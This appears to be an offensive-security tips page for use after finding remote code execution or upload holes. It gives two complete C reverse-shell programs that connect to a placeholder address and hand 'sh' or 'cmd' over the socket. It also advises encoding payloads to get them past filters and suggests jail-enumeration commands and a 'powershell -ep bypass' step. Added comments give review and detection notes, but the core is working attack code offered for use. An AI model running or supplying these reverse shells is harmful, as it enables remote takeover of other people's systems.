TIPS
If you have found a vulnerability such as RCE, file upload, or something else, you can use the script below to spawn a shell or a back-connect reverse shell. If the shell does not run, check the following:
- Make sure the target has internet access (internet access opened)
- Try changing the port to a larger one such as 8080, 8888, etc.
- Encode your script using base64 and then decode it
- Encode your script using url encode
- Check the compiler
C script spawning shell
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Opens an outbound TCP connection to a hard-coded address and port,
 * duplicates the connected socket onto file descriptors 0, 1 and 2, and then
 * replaces the process image with "sh" via execvp(). The shell's standard
 * input, output and error are therefore the network socket.
 *
 * Review notes:
 *  - None of the return values of socket(), connect(), dup2() or execvp()
 *    is checked, so a failure at any step goes unreported.
 *  - revsockaddr is not zero-initialised; only sin_family, sin_port and
 *    sin_addr are assigned.
 *  - "<IP>" is a placeholder left by the page, not a valid dotted-quad
 *    address.
 *
 * Defender's view: at runtime this looks like a process that makes an
 * outbound connection and then becomes a shell whose stdin/stdout/stderr
 * are a socket rather than a terminal or pipe. Egress filtering and
 * process/network telemetry that correlates shell execution with a socket
 * on fds 0-2 are the relevant controls.
 */
int main(void){
/* Destination TCP port, hard-coded. */
int port = 4444;
struct sockaddr_in revsockaddr;
/* IPv4 stream (TCP) socket; the result is not checked for -1. */
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
/* htons() converts the port to network byte order. */
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
/* Outbound connection from this host to the configured peer. */
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
/* Point stdin (0), stdout (1) and stderr (2) at the socket. */
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"sh", NULL};
/* execvp() searches PATH for "sh"; on success it does not return. */
execvp("sh", argv);
/* Reached only if execvp() failed. */
return 0;
}
C spawning cmd
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Same structure as the previous listing: connect a TCP socket to a
 * hard-coded address and port, duplicate it onto file descriptors 0, 1 and
 * 2, then call execvp(). The only differences are the address literal
 * ("0.0.0.0") and the program name ("cmd").
 *
 * Review notes:
 *  - The listing includes POSIX headers (<sys/socket.h>, <unistd.h>,
 *    <netinet/in.h>, <arpa/inet.h>) and uses dup2()/execvp(), while the page
 *    labels it as spawning "cmd".
 *  - "0.0.0.0" is presumably a placeholder for the peer address -- confirm
 *    against the page's intent.
 *  - No return value of socket(), connect(), dup2() or execvp() is checked.
 *
 * Defender's view: the observable pattern is the same as for the "sh"
 * variant -- an outbound connection followed by a command interpreter whose
 * standard streams are a socket.
 */
int main(void){
/* Destination TCP port, hard-coded. */
int port = 4444;
struct sockaddr_in revsockaddr;
/* IPv4 stream (TCP) socket; the result is not checked for -1. */
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
/* htons() converts the port to network byte order. */
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
/* Outbound connection from this host to the configured peer. */
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
/* Point stdin (0), stdout (1) and stderr (2) at the socket. */
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"cmd", NULL};
/* execvp() searches PATH for "cmd"; on success it does not return. */
execvp("cmd", argv);
/* Reached only if execvp() failed. */
return 0;
}
Enumerating the jail
# Read-only queries about the current shell environment; none of these
# commands changes any state.

# Value of the SHELL environment variable (the user's configured shell,
# which is not necessarily the shell that is currently running).
echo $SHELL
# Directories searched for commands.
echo $PATH
# All environment variables of the current process.
env
# With no arguments, lists the variables marked for export.
export
# Current working directory.
pwd
*Windows Powershell Pro Tips
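- If you have obtained a shell, you can switch to PowerShell by running the command below. `-ep bypass` sets the execution policy to Bypass for that process only; execution policy is not a security boundary, and the command line is still recorded by process-creation and PowerShell logging where those are enabled.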
powershell -ep bypass
Source